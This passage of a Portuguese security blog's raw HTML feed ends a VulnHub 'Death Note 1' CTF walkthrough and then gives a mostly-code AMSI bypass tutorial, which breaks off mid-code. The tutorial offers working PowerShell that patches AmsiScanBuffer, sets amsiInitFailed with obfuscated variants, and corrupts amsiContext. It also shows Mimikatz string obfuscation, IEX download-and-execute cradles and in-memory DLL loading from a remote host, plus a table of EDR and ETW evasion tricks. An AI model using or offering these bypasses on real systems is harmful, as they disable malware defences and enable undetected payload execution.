style="color:#98C379"> cd</span><span style="color:#98C379"> /opt</span></span> <span class="line"><span style="color:#61AFEF">l@deathnote:/opt$</span><span style="color:#98C379"> ls</span><span style="color:#D19A66"> -l</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>drwxr-xr-x 4 root root 4096 Aug 29 2021 L</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt$</span><span style="color:#98C379"> cd</span><span style="color:#98C379"> L</span><span style="color:#ABB2BF"> &#x26;&#x26; </span><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -l</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule</span></span> <span class="line"><span>drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case</span></span></code></pre> <h3 id="62-leitura-do-case-filetxt">6.2 Leitura do case-file.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L$</span><span style="color:#98C379"> cd</span><span style="color:#98C379"> kira-case</span><span style="color:#ABB2BF"> &#x26;&#x26; </span><span style="color:#61AFEF">cat</span><span style="color:#98C379"> case-file.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>the FBI agent died on December 27, 2006</span></span> <span class="line"><span></span></span> <span class="line"><span>1 week after the investigation of the task-force member/head.</span></span> <span class="line"><span>aka.....</span></span> <span class="line"><span>Soichiro Yagami's family.</span></span> <span class="line"><span></span></span> <span class="line"><span>hmmmmmmmmmm......</span></span> <span class="line"><span>and according to watari,</span></span> <span class="line"><span>he died as other died after Kira targeted them.</span></span> <span class="line"><span></span></span> <span class="line"><span>and we also found something in fake-notebook-rule folder.</span></span></code></pre> <h3 id="63-decodificação-hex--base64-do-casewav">6.3 Decodificação Hex + Base64 do case.wav</h3> <p>Dentro do diretório <code>fake-notebook-rule</code>, encontramos um arquivo <code>case.wav</code> ilegível como áudio:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L/fake-notebook-rule$</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> case.wav</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>63 47 46 7a 63 33 64 6b 49 44 4f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L/fake-notebook-rule$</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> hint</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>use cyberchef</span></span></code></pre> <p>Utilizando o <strong>CyberChef</strong> com a receita <code>From Hex → From Base64</code>:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Input (Hex):</span></span> <span class="line"><span>63 47 46 7a 63 33 64 6b 49 44 4f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d</span></span> <span class="line"><span></span></span> <span class="line"><span>Step 1 — From Hex:</span></span> <span class="line"><span>cGFzc3dkIDoga2lyYWlzZXZpbCA=</span></span> <span class="line"><span></span></span> <span class="line"><span>Step 2 — From Base64:</span></span> <span class="line"><span>passwd : kiraisevil</span></span></code></pre> <blockquote> <p>✅ <strong>Nova credencial encontrada: <code>kira</code> / <code>kiraisevil</code></strong></p> </blockquote> <h3 id="64-login-como-kira-e-decodificação-do-kiratxt">6.4 Login como kira e decodificação do kira.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Elevando para o usuário kira (ou reconectando via SSH)</span></span> <span class="line"><span style="color:#61AFEF">ssh</span><span style="color:#98C379"> kira@192.168.3.152</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># senha: kiraisevil</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">root@deathnote:/home/kira#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> kira.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp</span></span></code></pre> <p>Decodificando novamente via <strong>CyberChef</strong> (<code>From Base64</code>):</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>please protect one of the following</span></span> <span class="line"><span>1. L (/opt)</span></span> <span class="line"><span>2. Misa (/var)</span></span></code></pre> <h3 id="65-descoberta-do-arquivo-misa-em-var">6.5 Descoberta do arquivo Misa em /var</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">root@deathnote:/var#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> misa</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>it is toooo late for misa</span></span></code></pre> <hr> <h2 id="7-flags--root">7. Flags / Root</h2> <h3 id="71-captura-do-roottxt">7.1 Captura do root.txt</h3> <p>Navegando para o diretório home de root, localizamos o arquivo <code>root.txt</code>:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">root@deathnote:/var#</span><span style="color:#98C379"> cd</span></span> <span class="line"><span style="color:#61AFEF">root@deathnote:~#</span><span style="color:#98C379"> ls</span></span> <span class="line"><span style="color:#61AFEF">root.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">root@deathnote:~#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> root.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>[REDACTED]</span></span> <span class="line"><span></span></span> <span class="line"><span>##########follow me on twitter###########3</span></span> <span class="line"><span>and share this screen shot and tag @KDSAMF</span></span></code></pre> <blockquote> <p>🏁 <strong>CTF concluído com sucesso!</strong> A flag final foi obtida no arquivo <code>root.txt</code> no diretório home do usuário <code>root</code>.</p> </blockquote> <hr> <h2 id="8-conclusão">8. Conclusão</h2> <p>A máquina <strong>Death Note 1</strong> é um ótimo exercício para iniciantes em CTF, percorrendo um caminho clássico de comprometimento:</p> <table><thead><tr><th>Etapa</th><th>Técnica</th><th>Ferramenta</th></tr></thead><tbody><tr><td>Descoberta de host</td><td>ARP scan passivo</td><td><code>netdiscover</code></td></tr><tr><td>Mapeamento de superfície</td><td>Port/service scan</td><td><code>nmap</code></td></tr><tr><td>Enumeração web</td><td>Directory brute-force</td><td><code>DirBuster</code></td></tr><tr><td>Coleta de wordlists</td><td>Leitura de arquivos expostos</td><td><code>curl</code></td></tr><tr><td>Acesso inicial</td><td>SSH brute-force</td><td><code>hydra</code></td></tr><tr><td>Pós-exploração</td><td>Decodificação Hex + Base64</td><td><code>CyberChef</code></td></tr><tr><td>Escalada lateral</td><td>Reutilização de credencial</td><td><code>ssh</code></td></tr><tr><td>Captura de flag</td><td>Leitura de arquivo root</td><td><code>cat</code></td></tr></tbody></table> <p><strong>Principais aprendizados:</strong></p> <ul> <li>Arquivos aparentemente “corrompidos” podem conter dados úteis — sempre use <code>curl</code> ou <code>cat</code> antes de descartar.</li> <li>Wordlists expostas em diretórios web são um vetor crítico de ataque.</li> <li>Dados codificados em múltiplas camadas (Hex → Base64) são comuns em CTFs de nível fácil; ferramentas como CyberChef agilizam drasticamente a análise.</li> <li>A enumeração metódica de diretórios (<code>/opt</code>, <code>/var</code>) após o acesso inicial é essencial para encontrar caminhos de escalada.</li> </ul> <hr> <p><em>Escrito por <strong>G4ij1ntoor</strong> — <a href="https://kbmsecurity.com">KBM Security</a> · r3d/ops blog</em></p>redteam@kbmsecurity.com.brctfctfvulnhublinuxbrute-forcehydranmapsshweb-enumerationeasyAMSI Bypass — Desabilitando o Antimalware Scan Interface no PowerShellhttps://www.kbmsecurity.com.br/blog/post/amsi-bypass-powershell/https://www.kbmsecurity.com.br/blog/post/amsi-bypass-powershell/Técnicas para contornar o AMSI (Antimalware Scan Interface) do Windows e executar payloads PowerShell sem detecção por soluções AV/EDR.Mon, 10 Feb 2025 00:00:00 GMT<h2 id="o-que-é-amsi">O que é AMSI?</h2> <p>O <strong>AMSI (Antimalware Scan Interface)</strong> é uma API do Windows introduzida no Windows 10 que permite que aplicações enviem conteúdo para soluções antivírus escanearem <strong>em tempo real</strong>, antes da execução.</p> <p>O fluxo funciona assim:</p> <ol> <li>PowerShell recebe um script ou comando</li> <li>Antes de executar, chama <code>AmsiScanBuffer()</code> ou <code>AmsiScanString()</code> via <code>amsi.dll</code></li> <li>O AV/EDR registrado escaneia o conteúdo</li> <li>Se malicioso → bloqueado. Se limpo → execução prossegue</li> </ol> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span>PowerShell → amsi.dll → AmsiScanBuffer() → AV Provider → Allow / Block</span></span></code></pre> <p>Toda sessão do PowerShell carrega a <code>amsi.dll</code> no processo. O objetivo dos bypasses é neutralizar essa DLL <strong>antes</strong> de executar payloads ofensivos.</p> <blockquote> <p><strong>AVISO:</strong> Estas técnicas são para uso exclusivo em ambientes autorizados (pentest, red team, laboratório). O uso não autorizado é crime.</p> </blockquote> <h2 id="técnica-1--patch-de-amsiscanbuffer-via-reflection">Técnica 1 — Patch de AmsiScanBuffer via Reflection</h2> <p>A técnica mais clássica: usar .NET Reflection para localizar e patchear a função <code>AmsiScanBuffer</code> na memória, fazendo-a sempre retornar <code>AMSI_RESULT_CLEAN</code>.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># AMSI Patch via Reflection — clássico</span></span> <span class="line"><span style="color:#E06C75">$Win32</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> @"</span></span> <span class="line"><span style="color:#98C379">using System;</span></span> <span class="line"><span style="color:#98C379">using System.Runtime.InteropServices;</span></span> <span class="line"><span style="color:#98C379">public class Win32 {</span></span> <span class="line"><span style="color:#98C379"> [DllImport("kernel32")]</span></span> <span class="line"><span style="color:#98C379"> public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);</span></span> <span class="line"><span style="color:#98C379"> [DllImport("kernel32")]</span></span> <span class="line"><span style="color:#98C379"> public static extern IntPtr LoadLibrary(string name);</span></span> <span class="line"><span style="color:#98C379"> [DllImport("kernel32")]</span></span> <span class="line"><span style="color:#98C379"> public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);</span></span> <span class="line"><span style="color:#98C379">}</span></span> <span class="line"><span style="color:#98C379">"@</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">Add-Type</span><span style="color:#E06C75"> $Win32</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$Lib</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::LoadLibrary(</span><span style="color:#98C379">"amsi.dll"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$Addr</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::GetProcAddress(</span><span style="color:#E06C75">$Lib</span><span style="color:#ABB2BF">, </span><span style="color:#98C379">"AmsiScanBuffer"</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Patch: mov eax, 0x80070057 ; ret</span></span> <span class="line"><span style="color:#E06C75">$Patch</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Byte</span><span style="color:#ABB2BF">[]](</span><span style="color:#D19A66">0xB8</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x57</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x00</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x07</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x80</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$Old</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 0</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::VirtualProtect(</span><span style="color:#E06C75">$Addr</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">UIntPtr</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">5</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x40</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">ref</span><span style="color:#ABB2BF">]</span><span style="color:#E06C75">$Old</span><span style="color:#ABB2BF">) | </span><span style="color:#56B6C2">Out-Null</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$Marshal</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75">$Marshal</span><span style="color:#ABB2BF">::Copy(</span><span style="color:#E06C75">$Patch</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75">$Addr</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">6</span><span style="color:#ABB2BF">)</span></span></code></pre> <p>Após executar isso na sessão, o AMSI está neutralizado para o processo atual.</p> <h2 id="técnica-2--forçar-erro-via-amsiinitfailed">Técnica 2 — Forçar Erro via AmsiInitFailed</h2> <p>Uma abordagem mais furtiva: usar Reflection para setar o campo privado <code>amsiInitFailed</code> no contexto da sessão atual, fazendo o PowerShell acreditar que o AMSI falhou ao inicializar.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># AmsiInitFailed — forçar falha de inicialização</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetTypes() | </span><span style="color:#56B6C2">Where-Object</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.Name</span><span style="color:#56B6C2"> -like</span><span style="color:#98C379"> '*Am*i*'</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$b</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $a</span><span style="color:#ABB2BF"> | </span><span style="color:#56B6C2">ForEach-Object</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.GetFields</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">'NonPublic,Static'</span><span style="color:#ABB2BF">) | </span><span style="color:#56B6C2">Where-Object</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.Name</span><span style="color:#56B6C2"> -like</span><span style="color:#98C379"> '*ailed*'</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$b.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span></code></pre> <p>Este método é frequentemente detectado por EDRs modernos pois a string <code>amsiInitFailed</code> virou uma assinatura. Use obfuscação:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Versão obfuscada com concatenação de strings</span></span> <span class="line"><span style="color:#E06C75">$x</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> 'Am'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'si'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Utils'</span></span> <span class="line"><span style="color:#E06C75">$y</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> 'am'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'si'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Init'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Failed'</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$t</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(</span><span style="color:#98C379">"System.Management.Automation.</span><span style="color:#E06C75">$x</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$f</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $t.GetField</span><span style="color:#ABB2BF">(</span><span style="color:#E06C75">$y</span><span style="color:#ABB2BF">, </span><span style="color:#98C379">'NonPublic,Static'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$f.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="técnica-3--patch-com-marshalwriteint32">Técnica 3 — Patch com Marshal.WriteInt32</h2> <p>Variação do patch direto, usando <code>Marshal.WriteInt32</code> sem precisar de P/Invoke custom:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Bypass via Marshal sem Add-Type</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75">$b</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(</span><span style="color:#98C379">'System.Management.Automation.AmsiUtils'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$c</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $b.GetField</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">'amsiContext'</span><span style="color:#ABB2BF">, </span><span style="color:#98C379">'NonPublic,Static'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$d</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $c.GetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Corrompe o contexto AMSI</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#ABB2BF">::WriteInt32([</span><span style="color:#C678DD">IntPtr</span><span style="color:#ABB2BF">](</span><span style="color:#E06C75">$d.ToInt64</span><span style="color:#ABB2BF">() </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 0x8</span><span style="color:#ABB2BF">), </span><span style="color:#D19A66">0</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="técnica-4--downgrade-para-powershell-20">Técnica 4 — Downgrade para PowerShell 2.0</h2> <p>O PowerShell 2.0 não implementa AMSI. Se ainda estiver instalado no sistema:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Verifica se PS 2.0 está disponível</span></span> <span class="line"><span style="color:#ABB2BF">powershell </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">version </span><span style="color:#D19A66">2</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Command </span><span style="color:#98C379">"$PSVersionTable"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Executa payload no contexto PS 2.0 (sem AMSI)</span></span> <span class="line"><span style="color:#ABB2BF">powershell </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">version </span><span style="color:#D19A66">2</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ExecutionPolicy Bypass </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">File payload.ps1</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Verifica instalação do .NET 2.0/3.5 (necessário para PS 2.0)</span></span> <span class="line"><span style="color:#56B6C2">Get-WindowsOptionalFeature</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Online </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">FeatureName MicrosoftWindowsPowerShellV2Root</span></span></code></pre> <blockquote> <p><strong>Nota:</strong> Muitos ambientes modernos têm PS 2.0 desabilitado via GPO. Verifique antes de tentar.</p> </blockquote> <h2 id="técnica-5--obfuscação-de-strings-evasão-de-assinaturas">Técnica 5 — Obfuscação de Strings (Evasão de Assinaturas)</h2> <p>Em vez de patchear AMSI, evite ativá-lo. Strings conhecidas como <code>amsiInitFailed</code>, <code>AmsiScanBuffer</code>, <code>Invoke-Mimikatz</code> ativam assinaturas. Use obfuscação:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Concatenação simples</span></span> <span class="line"><span style="color:#E06C75">$cmd</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> 'Invoke'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> '-'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Mi'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'mi'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'katz'</span></span> <span class="line"><span style="color:#ABB2BF">IEX </span><span style="color:#E06C75">$cmd</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Base64 encoding</span></span> <span class="line"><span style="color:#E06C75">$encoded</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Convert</span><span style="color:#ABB2BF">]::ToBase64String([</span><span style="color:#C678DD">Text.Encoding</span><span style="color:#ABB2BF">]::Unicode.GetBytes(</span><span style="color:#98C379">'Invoke-Mimikatz'</span><span style="color:#ABB2BF">))</span></span> <span class="line"><span style="color:#ABB2BF">IEX ([</span><span style="color:#C678DD">Text.Encoding</span><span style="color:#ABB2BF">]::Unicode.GetString([</span><span style="color:#C678DD">Convert</span><span style="color:#ABB2BF">]::FromBase64String(</span><span style="color:#E06C75">$encoded</span><span style="color:#ABB2BF">)))</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SecureString (menos comum mas eficaz)</span></span> <span class="line"><span style="color:#E06C75">$s</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> 'amsiInitFailed'</span></span> <span class="line"><span style="color:#E06C75">$secure</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> ConvertTo-SecureString</span><span style="color:#E06C75"> $s</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">AsPlainText </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">Force</span></span> <span class="line"><span style="color:#E06C75">$plain</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::PtrToStringAuto(</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::SecureStringToBSTR(</span><span style="color:#E06C75">$secure</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="técnica-6--carregamento-via-webrequest-in-memory">Técnica 6 — Carregamento via WebRequest (In-Memory)</h2> <p>Carregar payloads diretamente na memória sem tocar o disco, minimizando surface de detecção:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Bypass + carregamento in-memory</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># 1. Disable AMSI primeiro</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># 2. Carrega assembly remoto sem escritar em disco</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">IEX (</span><span style="color:#56B6C2">New-Object</span><span style="color:#ABB2BF"> Net.WebClient).DownloadString(</span><span style="color:#98C379">'http://192.168.1.10/bypass.ps1'</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Ou via IWR</span></span> <span class="line"><span style="color:#E06C75">$r</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> Invoke-WebRequest</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Uri </span><span style="color:#98C379">'http://192.168.1.10/payload.ps1'</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">UseBasicParsing</span></span> <span class="line"><span style="color:#ABB2BF">IEX </span><span style="color:#E06C75">$r.Content</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Assembly .NET em memória</span></span> <span class="line"><span style="color:#E06C75">$bytes</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> (</span><span style="color:#56B6C2">New-Object</span><span style="color:#ABB2BF"> Net.WebClient).DownloadData(</span><span style="color:#98C379">'http://192.168.1.10/tool.dll'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Reflection.Assembly</span><span style="color:#ABB2BF">]::Load(</span><span style="color:#E06C75">$bytes</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="detecção-e-contornos-de-edr">Detecção e Contornos de EDR</h2> <p>EDRs modernos monitoram além do AMSI:</p> <table><thead><tr><th>Vetor de Detecção</th><th>Técnica de Evasão</th></tr></thead><tbody><tr><td>Assinaturas de string</td><td>Obfuscação, encoding, concatenação</td></tr><tr><td>Script Block Logging</td><td>Patchear <code>ScriptBlockLoggingEnabled</code> via registro</td></tr><tr><td>ETW (Event Tracing)</td><td>Patchear <code>EtwEventWrite</code> em <code>ntdll.dll</code></td></tr><tr><td>Constrained Language Mode</td><td>Bypass via COM, <code>Add-Type</code>, runspaces</td></tr><tr><td>WLDP (WDAC)</td><td>Técnicas mais avançadas de process injection</td></tr></tbody></table> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span 